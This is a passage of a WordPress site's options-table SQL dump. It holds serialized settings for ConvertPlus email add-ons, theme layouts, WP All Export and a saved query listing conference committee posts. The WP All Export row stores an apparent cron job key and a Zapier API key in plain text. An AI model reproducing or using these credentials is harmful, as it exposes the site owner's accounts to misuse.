Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.2\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:20:\"connects-mailget.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:33;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-mailgun\";s:4:\"init\";s:37:\"connects-mailgun/connects-mailgun.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-mailgun.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:18:\"Connects - Mailgun\";s:10:\"short_name\";s:7:\"Mailgun\";s:7:\"version\";s:5:\"1.0.1\";s:6:\"tested\";s:3:\"4.8\";s:4:\"slug\";s:16:\"connects-mailgun\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-1.png\";s:11:\"description\";s:48:\"Integrate with Mailgun Email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.1\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:20:\"connects-mailgun.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:34;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:16:\"connects-klaviyo\";s:4:\"init\";s:37:\"connects-klaviyo/connects-klaviyo.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:20:\"connects-klaviyo.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:24:\"Connects - Klaviyo Addon\";s:10:\"short_name\";s:8:\"Klaviyo \";s:7:\"version\";s:5:\"1.0.3\";s:6:\"tested\";s:5:\"4.9.5\";s:4:\"slug\";s:16:\"connects-klaviyo\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-2.png\";s:11:\"description\";s:54:\"Use this plugin to integrate Klaviyo with Convert Plus\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.3\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:5:\"1.0.0\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:35;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:17:\"connects-sendlane\";s:4:\"init\";s:39:\"connects-sendlane/connects-sendlane.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:21:\"connects-sendlane.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - Sendlane Mailer\";s:10:\"short_name\";s:8:\"Sendlane\";s:7:\"version\";s:5:\"1.0.1\";s:6:\"tested\";s:5:\"4.9.2\";s:4:\"slug\";s:17:\"connects-sendlane\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-3.png\";s:11:\"description\";s:42:\"Integration with Sendlane Email Marketing.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.1\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:21:\"connects-sendlane.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:57:\"https://changelog.brainstormforce.com/convertplug-addons/\";}i:36;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:20:\"connects-elasticmail\";s:4:\"init\";s:45:\"connects-elasticmail/connects-elasticmail.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:24:\"connects-elasticmail.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:24:\"Connects - Elastic Email\";s:10:\"short_name\";s:13:\"Elastic Email\";s:7:\"version\";s:5:\"1.0.2\";s:6:\"tested\";s:5:\"5.0.3\";s:4:\"slug\";s:20:\"connects-elasticmail\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-4.png\";s:11:\"description\";s:38:\"Integrate with Elastic Email Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.2\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:24:\"connects-elasticmail.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:0:\"\";}i:37;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:17:\"connects-mailwizz\";s:4:\"init\";s:39:\"connects-mailwizz/connects-mailwizz.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:21:\"connects-mailwizz.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - MailWizz Mailer\";s:10:\"short_name\";s:8:\"MailWizz\";s:7:\"version\";s:5:\"1.0.5\";s:6:\"tested\";s:5:\"5.7.2\";s:4:\"slug\";s:17:\"connects-mailwizz\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-5.png\";s:11:\"description\";s:65:\"Integrate MailWizz email Marketing application with Convert Plus.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.5\";s:12:\"version_beta\";s:5:\"1.0.4\";s:17:\"download_url_beta\";s:21:\"connects-mailwizz.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:80:\"https://changelog.brainstormforce.com/convertplug-addons/mailwizz-version-1-0-4/\";}i:38;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:5:\"false\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:17:\"connects-sendgrid\";s:4:\"init\";s:39:\"connects-sendgrid/connects-sendgrid.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:21:\"connects-sendgrid.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:26:\"Connects - SendGrid Mailer\";s:10:\"short_name\";s:8:\"SendGrid\";s:7:\"version\";s:5:\"1.0.2\";s:6:\"tested\";s:5:\"5.8.1\";s:4:\"slug\";s:17:\"connects-sendgrid\";s:13:\"product_image\";s:67:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-6.png\";s:11:\"description\";s:51:\"Integration with SendGrid email Marketing Services.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.2\";s:12:\"version_beta\";s:6:\"1.0.20\";s:17:\"download_url_beta\";s:21:\"connects-sendgrid.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:0:\"\";}i:39;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:15:\"connects-zapier\";s:4:\"init\";s:35:\"connects-zapier/connects-zapier.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:19:\"connects-zapier.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:24:\"Connects - Zapier Mailer\";s:10:\"short_name\";s:7:\"Zapier \";s:7:\"version\";s:5:\"1.0.4\";s:6:\"tested\";s:3:\"5.0\";s:4:\"slug\";s:15:\"connects-zapier\";s:13:\"product_image\";s:82:\"//support.brainstormforce.com/wp-content/uploads/2017/07/logo-7-e1534416295165.png\";s:11:\"description\";s:31:\"Integrate Zapier with connects.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.4\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:19:\"connects-zapier.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:0:\"\";}i:40;O:8:\"stdClass\":21:{s:15:\"licence_require\";s:4:\"true\";s:22:\"licence_require_update\";s:0:\"\";s:19:\"must_have_extension\";s:5:\"false\";s:2:\"id\";s:19:\"connects-convertfox\";s:4:\"init\";s:43:\"connects-convertfox/connects-convertfox.php\";s:6:\"author\";s:16:\"Brainstorm Force\";s:12:\"download_url\";s:23:\"connects-convertfox.zip\";s:4:\"type\";s:6:\"plugin\";s:4:\"name\";s:15:\"Connects - Gist\";s:10:\"short_name\";s:4:\"Gist\";s:7:\"version\";s:5:\"1.0.1\";s:6:\"tested\";s:3:\"5.4\";s:4:\"slug\";s:19:\"connects-convertfox\";s:13:\"product_image\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2019/06/Gist.png\";s:11:\"description\";s:25:\"Collect leads using Gist.\";s:8:\"in_house\";s:4:\"true\";s:6:\"remote\";s:5:\"1.0.1\";s:12:\"version_beta\";s:5:\"1.0.0\";s:17:\"download_url_beta\";s:23:\"connects-convertfox.zip\";s:6:\"parent\";s:8:\"14058953\";s:13:\"changelog_url\";s:82:\"https://changelog.brainstormforce.com/convertplug-addons/convertfox-version-1-0-1/\";}}}','yes'),
(365618,'widget_finley_widget_author_profile','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(365619,'widget_finley_widget_recent_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(365620,'widget_finley_widget_popular_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(365621,'theme_mods_zinl','a:3:{s:18:\"nav_menu_locations\";a:1:{s:6:\"menu-1\";i:5;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1692967196;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:11:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";i:6;s:7:\"block-2\";i:7;s:7:\"block-3\";i:8;s:7:\"block-4\";i:9;s:7:\"block-5\";i:10;s:7:\"block-6\";}s:9:\"sidebar-1\";a:0:{}}}}','yes'),
(365626,'theme_mods_dt-the7old','a:3:{s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:5;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1692964649;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:15:{i:0;s:31:\"presscore-contact-form-widget-2\";i:1;s:21:\"presscore-portfolio-2\";i:2;s:21:\"presscore-portfolio-3\";i:3;i:9022;i:4;s:10:\"archives-2\";i:5;s:6:\"meta-2\";i:6;s:8:\"search-2\";i:7;s:12:\"categories-2\";i:8;s:14:\"recent-posts-2\";i:9;s:17:\"recent-comments-2\";i:10;s:7:\"block-2\";i:11;s:7:\"block-3\";i:12;s:7:\"block-4\";i:13;s:7:\"block-5\";i:14;s:7:\"block-6\";}s:9:\"sidebar_1\";a:0:{}s:9:\"sidebar_2\";a:0:{}}}}','yes'),
(365658,'the7_db_version','11.6.0.1','yes'),
(367096,'wpb_js_compiled_js_composer_less','','yes'),
(372232,'PMXE_Plugin_Options','a:15:{s:12:\"info_api_url\";s:27:\"https://www.wpallimport.com\";s:7:\"dismiss\";i:0;s:18:\"dismiss_manage_top\";i:0;s:21:\"dismiss_manage_bottom\";i:0;s:12:\"cron_job_key\";s:12:\"I6WdAPUjzz78\";s:14:\"max_input_time\";i:-1;s:18:\"max_execution_time\";i:0;s:6:\"secure\";i:1;s:7:\"license\";s:0:\"\";s:14:\"license_status\";s:0:\"\";s:18:\"scheduling_license\";s:0:\"\";s:25:\"scheduling_license_status\";s:0:\"\";s:14:\"zapier_api_key\";s:32:\"fzlKQJepjCVc5cYwdBfziqeJrEi9qzQ3\";s:21:\"zapier_invitation_url\";s:0:\"\";s:30:\"zapier_invitation_url_received\";s:0:\"\";}','yes'),
(372233,'wp_all_export_free_addons_not_included','1','yes'),
(372234,'wp_all_export_free_db_version','1.3.9','yes'),
(372239,'_wpallexport_session_new_','a:87:{s:14:\"is_user_export\";b:0;s:17:\"is_comment_export\";b:0;s:18:\"is_taxonomy_export\";b:0;s:3:\"cpt\";s:24:\"a:1:{i:0;s:7:\"dt_team\";}\";s:11:\"whereclause\";s:0:\"\";s:10:\"joinclause\";s:6:\"a:0:{}\";s:11:\"exportquery\";s:13423:\"O:8:\"WP_Query\":57:{s:5:\"query\";a:5:{s:9:\"post_type\";a:1:{i:0;s:7:\"dt_team\";}s:11:\"post_status\";s:3:\"any\";s:7:\"orderby\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:14:\"posts_per_page\";i:10;}s:10:\"query_vars\";a:67:{s:9:\"post_type\";a:1:{i:0;s:7:\"dt_team\";}s:11:\"post_status\";s:3:\"any\";s:7:\"orderby\";s:2:\"ID\";s:5:\"order\";s:3:\"ASC\";s:14:\"posts_per_page\";i:10;s:5:\"error\";s:0:\"\";s:1:\"m\";s:0:\"\";s:1:\"p\";i:0;s:11:\"post_parent\";s:0:\"\";s:7:\"subpost\";s:0:\"\";s:10:\"subpost_id\";s:0:\"\";s:10:\"attachment\";s:0:\"\";s:13:\"attachment_id\";i:0;s:4:\"name\";s:0:\"\";s:8:\"pagename\";s:0:\"\";s:7:\"page_id\";i:0;s:6:\"second\";s:0:\"\";s:6:\"minute\";s:0:\"\";s:4:\"hour\";s:0:\"\";s:3:\"day\";i:0;s:8:\"monthnum\";i:0;s:4:\"year\";i:0;s:1:\"w\";i:0;s:13:\"category_name\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:3:\"cat\";s:0:\"\";s:6:\"tag_id\";s:0:\"\";s:6:\"author\";s:0:\"\";s:11:\"author_name\";s:0:\"\";s:4:\"feed\";s:0:\"\";s:2:\"tb\";s:0:\"\";s:5:\"paged\";i:0;s:8:\"meta_key\";s:0:\"\";s:10:\"meta_value\";s:0:\"\";s:7:\"preview\";s:0:\"\";s:1:\"s\";s:0:\"\";s:8:\"sentence\";s:0:\"\";s:5:\"title\";s:0:\"\";s:6:\"fields\";s:0:\"\";s:10:\"menu_order\";s:0:\"\";s:5:\"embed\";s:0:\"\";s:12:\"category__in\";a:0:{}s:16:\"category__not_in\";a:0:{}s:13:\"category__and\";a:0:{}s:8:\"post__in\";a:0:{}s:12:\"post__not_in\";a:0:{}s:13:\"post_name__in\";a:0:{}s:7:\"tag__in\";a:0:{}s:11:\"tag__not_in\";a:0:{}s:8:\"tag__and\";a:0:{}s:12:\"tag_slug__in\";a:0:{}s:13:\"tag_slug__and\";a:0:{}s:15:\"post_parent__in\";a:0:{}s:19:\"post_parent__not_in\";a:0:{}s:10:\"author__in\";a:0:{}s:14:\"author__not_in\";a:0:{}s:14:\"search_columns\";a:0:{}s:19:\"ignore_sticky_posts\";b:0;s:16:\"suppress_filters\";b:0;s:13:\"cache_results\";b:1;s:22:\"update_post_term_cache\";b:1;s:22:\"update_menu_item_cache\";b:0;s:19:\"lazy_load_term_meta\";b:1;s:22:\"update_post_meta_cache\";b:1;s:8:\"nopaging\";b:0;s:17:\"comments_per_page\";s:2:\"50\";s:13:\"no_found_rows\";b:0;}s:9:\"tax_query\";O:12:\"WP_Tax_Query\":6:{s:7:\"queries\";a:0:{}s:8:\"relation\";s:3:\"AND\";s:16:\"\0*\0table_aliases\";a:0:{}s:13:\"queried_terms\";a:0:{}s:13:\"primary_table\";s:15:\"dnctiavkr_posts\";s:17:\"primary_id_column\";s:2:\"ID\";}s:10:\"meta_query\";O:13:\"WP_Meta_Query\":9:{s:7:\"queries\";a:0:{}s:8:\"relation\";N;s:10:\"meta_table\";N;s:14:\"meta_id_column\";N;s:13:\"primary_table\";N;s:17:\"primary_id_column\";N;s:16:\"\0*\0table_aliases\";a:0:{}s:10:\"\0*\0clauses\";a:0:{}s:18:\"\0*\0has_or_relation\";b:0;}s:10:\"date_query\";b:0;s:14:\"queried_object\";N;s:17:\"queried_object_id\";N;s:7:\"request\";s:538:\"\n					SELECT SQL_CALC_FOUND_ROWS  dnctiavkr_posts.ID\n					FROM dnctiavkr_posts \n					WHERE 1=1  AND dnctiavkr_posts.post_type = \'dt_team\' AND ((dnctiavkr_posts.post_status <> \'trash\' AND dnctiavkr_posts.post_status <> \'auto-draft\')) AND dnctiavkr_posts.ID NOT IN (SELECT o.ID FROM dnctiavkr_posts o\n                            LEFT OUTER JOIN dnctiavkr_posts r ON o.post_parent = r.ID WHERE ((r.post_status = \'trash\' OR r.ID IS NULL) AND o.post_type = \'product_variation\'))\n					\n					ORDER BY dnctiavkr_posts.ID ASC\n					LIMIT 0, 10\n				\";s:5:\"posts\";a:10:{i:0;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2487;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 16:52:42\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 16:52:42\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:58:\"Prof. Jun Chen, National Geomatics Center of China, China.\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:54:\"prof-jun-chen-national-geomatics-center-of-china-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-14 16:40:25\";s:17:\"post_modified_gmt\";s:19:\"2022-10-14 16:40:25\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2487\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:1;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2495;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:15:44\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:15:44\";s:12:\"post_content\";s:61:\"<!-- wp:paragraph -->\n<p>(WG IV/7)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:45:\"Prof. Songnian Li, Ryerson University, Canada\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:42:\"prof-songnian-li-ryerson-university-canada\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:24:39\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:24:39\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2495\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:2;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2498;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:25:09\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:25:09\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:58:\"Prof. Maria Antonia Brovelli, Politecnico di Milano, Italy\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:55:\"prof-maria-antonia-brovelli-politecnico-di-milano-italy\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:38:12\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:38:12\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2498\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:3;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2500;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:26:06\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:26:06\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:46:\"Dr. Hao Wu, National Geomatics Center of China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:44:\"dr-hao-wu-national-geomatics-center-of-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:38:43\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:38:43\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2500\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:4;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2503;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 17:28:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 17:28:08\";s:12:\"post_content\";s:0:\"\";s:10:\"post_title\";s:49:\"Dr. Dongyang Hou, Central South University, China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:46:\"dr-dongyang-hou-central-south-university-china\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:48:22\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:48:22\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2503\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:5;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2521;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 18:59:18\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 18:59:18\";s:12:\"post_content\";s:63:\"<!-- wp:paragraph -->\n<p>(ICWG I/IV)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:26:\"Ville Lehtola, Netherlands\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:35:\"ville-lehtola-netherlands-icwg-i-iv\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:25:40\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:25:40\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2521\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:6;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2523;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:00:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:00:08\";s:12:\"post_content\";s:60:\"<!-- wp:paragraph -->\n<p>(WG I/2)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:30:\"Andrea Masiero, Italy (WG I/2)\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:27:\"andrea-masiero-italy-wg-i-2\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:31:25\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:31:25\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2523\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:7;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2525;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:00:44\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:00:44\";s:12:\"post_content\";s:63:\"<!-- wp:paragraph -->\n<p>(ICWG I/IV)</p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:25:\"Dorota Iwaszczuk, Germany\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:34:\"dorota-iwaszczuk-germany-icwg-i-iv\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:32:19\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 05:32:19\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2525\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:8;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2527;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:02:08\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:02:08\";s:12:\"post_content\";s:153:\"<!-- wp:paragraph -->\n<p>National Cheng Kung University, Taiwan (WG I/2)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\";s:10:\"post_title\";s:14:\"Kai-Wei Chiang\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:14:\"kai-wei-chiang\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-10-09 05:49:14\";s:17:\"post_modified_gmt\";s:19:\"2022-10-09 05:49:14\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:50:\"https://gsw2023.com/?post_type=dt_team&#038;p=2527\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:7:\"dt_team\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}i:9;O:7:\"WP_Post\":24:{s:2:\"ID\";i:2531;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2022-10-07 19:03:47\";s:13:\"post_date_gmt\";s:19:\"2022-10-07 19:03:47\";s:12:\"post_content\";s:133:\"<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>(WG I/8)</td></tr></tbody></table></figure>\n<!-- /wp:table -->\";s:10:\"post_title\";s:36:\"Cheng Wang, Xiamen University, China\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:41:\"cheng-wang-xiamen-university-china-wg-i-8\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2022-12-06 05:31:51\";s:17:\"post_modified_gmt\";s:19:\"2022-12-06 